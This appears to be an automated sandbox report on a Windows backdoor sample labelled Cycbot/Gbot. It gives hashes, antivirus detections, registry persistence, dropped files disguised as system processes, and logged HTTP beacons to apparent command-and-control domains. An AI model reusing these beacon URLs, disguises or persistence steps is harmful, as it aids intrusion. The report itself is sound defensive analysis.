Analysis Date: 2015-01-17 13:31:04
MD5: 9fec99e8c3988036a41b09226601f3b7
SHA1: 16b40b8fcc4efdcd49731c0be20badfa6b8ba64e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: fb2dffe70697aebf26b16e10dfc7ec8c sha1: cd3cafbc1a55e6f8f482e0bf7b1218abd69ac777 size: 105472
Section: .rdata md5: e81a055cdcfb84f33ffe89e59f81b94c sha1: 7b3b8a1f5a85e72c00210467cc0f9f58ea37f2e7 size: 1024
Section: .data md5: 8b70c379635a772a0e487c11014cdee0 sha1: 597ece7b7a3b09c51fcee3059d0005f851d0048d size: 23040
Section: .rsrc md5: 710582cabb2edf5e8b166286ea1ae341 sha1: 2160016c65bbc7fb438f781078c1fadbc7693815 size: 1024
Timestamp: 2005-09-19 21:36:43
Version: PrivateBuild: 1113
PEhash: deb124207f040a1fb31a7a4fbe63acad2e4ca613
IMPhash: 3d5a10fa61498acb13b5a00c7145c6e8
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Diple-19
AV Dr. Web: Trojan.DownLoader1.42568
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.IVA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.GTC
AV Grisoft (avg): Agent.5.BJ
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.bs
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: dolbyaudiodevice.com
Winsock DNS: zoneck.com
Winsock DNS: www.google.com
Winsock DNS: motherboardstest.com
Winsock DNS: 127.0.0.1
Winsock DNS: sharewareconnection.com
Winsock DNS: zonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: zonejm.com, Type: A, 23.239.15.54
DNS: sharewareconnection.com, Type: A, 216.240.159.81
DNS: www.google.com, Type: A, 173.194.37.81
DNS: www.google.com, Type: A, 173.194.37.80
DNS: www.google.com, Type: A, 173.194.37.84
DNS: www.google.com, Type: A, 173.194.37.83
DNS: www.google.com, Type: A, 173.194.37.82
DNS: zoneck.com, Type: A, 208.79.234.132
DNS: motherboardstest.com, Type: A, 204.11.56.45
DNS: xibudific.cn, Type: A
DNS: dolbyaudiodevice.com, Type: A
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUzyvw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51AortCC5IaGUUmp1NLyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://sharewareconnection.com/images/ubar_1.jpg?tq=gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUzyvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUzyvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUr1%2BjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUr1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1032 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1033 ➝ 216.240.159.81:80
Flows TCP: 192.168.1.1:1034 ➝ 173.194.37.81:80
Flows TCP: 192.168.1.1:1035 ➝ 173.194.37.81:80
Flows TCP: 192.168.1.1:1036 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1038 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1039 ➝ 208.79.234.132:80

Raw Pcap

Strings